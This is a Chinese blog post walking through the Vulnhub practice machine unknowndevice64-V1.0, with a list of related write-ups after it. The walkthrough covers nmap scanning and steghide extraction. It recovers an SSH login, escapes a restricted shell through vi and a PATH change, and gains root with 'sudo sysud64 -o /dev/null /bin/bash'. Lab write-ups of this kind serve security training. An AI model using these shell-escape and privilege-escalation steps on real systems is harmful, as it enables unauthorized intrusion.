Vulnhub靶机 unknowndevice64-V1.0(渗透测试详解)

于 2024-08-11 02:10:31 发布
阅读量173 收藏 8
点赞数 2
文章标签: 安全性测试 服务器 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78721909/article/details/141099302
版权

一、靶机信息收集

1、靶机下载地址

https://download.vulnhub.com/unknowndevice64/unknowndevice64-V1.0.ova

2、扫描靶机IP

nmap 192.168.31.0/24

3、探测靶机主机、端口、服务信息

nmap -sS -sV -A -p- 192.168.31.154

二、web渗透测试

1、访问http开启端口

没什么发现

f12查看源码,发现有一个图片 key_is_h1dd3n.jpg

2、访问图片,上面写着 隐藏的秘密

将图片下载下来,在kali中使用 steghide 工具提取信息

需要输入密码,根据图片名字知道密码为h1dd3n

得到一个好h1dd3n.txt文本

3、查看文件内容,是 brainfuck 加密

4、解密

ud64:1M!#64@ud

5、登录ssh

ssh ud64@192.168.31.154 -p 1337

三、提权

1、发现很多命令被限制,是rbash的shell,双击tab键,查看可执行命令

使用vi 绕过,还是有部分命令无法执行

vi

shift 加 :

!/bin/bash

2、export 配置环境变量绕过

export PATH=/usr/sbin:/usr/bin:/sbin:/bin

3、查看当前权限

发现sysud64可以执行所有权限

sysud64 -h 查看帮助

可以使用

-o file send trace output to FILE instead of stderr

4、尝试提权,提权成功

sudo sysud64 -o /dev/null /bin/bash

提权成功!!!

芜丶湖
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机AI-Web-1.0渗透笔记
weixin_52125240的博客
07-14 1386
vulnhub靶机AI-Web-1.0渗透笔记
vulnhub靶机AI-Web-1.0渗透过程
2401_82463993的博客
03-08 973
(根据前面找到的info.php文件暴露的信息,绝对路径选择:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/)下面就是要选择文件路径:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/(info.php里面就是服务器上的PHP配置信息,这个页面会列出PHP版本、服务器操作系统、PHP配置参数等信息)这边有个index.php文件,(这是个网站的默认首页文件)访问一下。
unknowndevice64-V1.0靶机渗透测试
weixin_58786230的博客
08-09 248
【代码】unknowndevice64-V1.0靶机渗透测试
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4183
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
vulnhub系列:unknowndevice64-V1.0
jq_j37的博客
08-08 231
vulnhub系列:unknowndevice64-V1.0靶机,打靶文章
unknowndevice64-V1.0靶机
最新发布
zdd1453691081的博客
08-09 160
【代码】unknowndevice64-V1.0靶机
vulnhubunknowndevice64-V1.0渗透实战
weixin_43862283的博客
04-15 476
vulnhubunknowndevice64-V1.0渗透实战 0x01 环境及配置 难度:中级 目标:获取root权限并阅读/root/flag.txt 网络:桥接模式 DHCP自动分配IP地址 下载地址:https://mega.nz/#!WyQ1UaKC!azV9qvOXqzxOXFcE9qP15fQTEOWgr27plE0SmZTvGhk 靶机:192.168.34.152 攻击机:ka...
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1500
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
VulnHub靶机 DC-5 打靶 渗透测试详细过程
rumil的博客
04-18 1061
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Postman 中的 API 安全性测试:最佳实践与技巧
2402_85762143的博客
07-12 682
通过本文的介绍,你应该对如何在 Postman 中进行 API 的安全性测试有了深入的了解。记住,安全性测试是一个持续的过程,需要定期进行以应对不断变化的安全威胁。使用 Postman 提供的工具和技巧,你可以为你的 API 构建一个强大的安全防线。
hongmeng开发
qq_46025779的博客
08-07 452
/全局自定义构建函数Row(){Column(){//全局公共样式函数注意:只能抽取公共的,例如text,image这种有特有属性的组件就用不了需要**@Extend()**继承该组件才可以(继承模式只能写在全局里。
搭建pxe网络安装环境实现服务器自动部署
2301_77475090的博客
08-05 532
【代码】云原生-搭建pxe网络安装环境实现服务器自动部署。
Jtti:网站服务器频繁更换IP对网站有哪些影响?
JttiSEO的博客
08-07 303
这一过程中,网站的排名可能会出现波动,甚至暂时下降,影响网站的曝光度和流量。通过科学合理的规划和有效的应对策略,可以最大限度地减少这些影响,保障网站的稳定运营和用户体验。邮件服务优化:与邮件服务提供商沟通,确保更换IP后邮件发送服务的稳定性和可信度,同时优化邮件内容,提高用户打开率和互动率。SEO优化:在更换IP后,加强SEO优化工作,如提交新的sitemap、增加高质量内容等,帮助搜索引擎快速重新索引网站。及时通知:在更换IP前,通过网站公告、邮件等方式提前通知用户,减少因DNS缓存导致的访问问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值